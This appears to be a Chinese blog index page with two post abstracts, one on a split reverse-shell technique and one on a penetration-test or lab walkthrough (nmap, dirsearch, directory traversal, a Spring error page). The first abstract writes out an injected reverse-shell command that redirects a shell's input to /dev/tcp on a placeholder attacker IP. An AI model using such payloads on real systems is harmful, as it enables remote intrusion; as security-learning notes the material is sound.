摘要:
分段反向shell 然后还学习到一个新姿势,查了一些资料。首先使用如下命令来创建一个与攻击者的tcp连接,并将标准输入(0)重定向到这个连接,sh是一个子shell的标记,用来在括号内执行命令。 ;`(sh)0>/dev/tcp/ip/9999` 之后执行如下将标准输出(1)和标准错误(2)都重定向 阅读全文
posted @ 2023-10-03 20:40
cc0vc
阅读(14)
评论(0)
推荐(0)
摘要:
一、信息收集 连接上vpn之后,我们拿到了给出来的ip地址 通过nmap扫描发现存在 80 跟22 端口泄露 访问80端口直接访问会出现问题,这时候可能会出现错误,我们修改我们的host 通过dirsearch 扫描目录发现,存在目录泄露点和一个目录遍历点 二、漏洞利用 通过报错页面察觉到是spri 阅读全文
posted @ 2023-10-03 20:23
cc0vc
阅读(469)
评论(0)
推荐(0)
浙公网安备 33010602011771号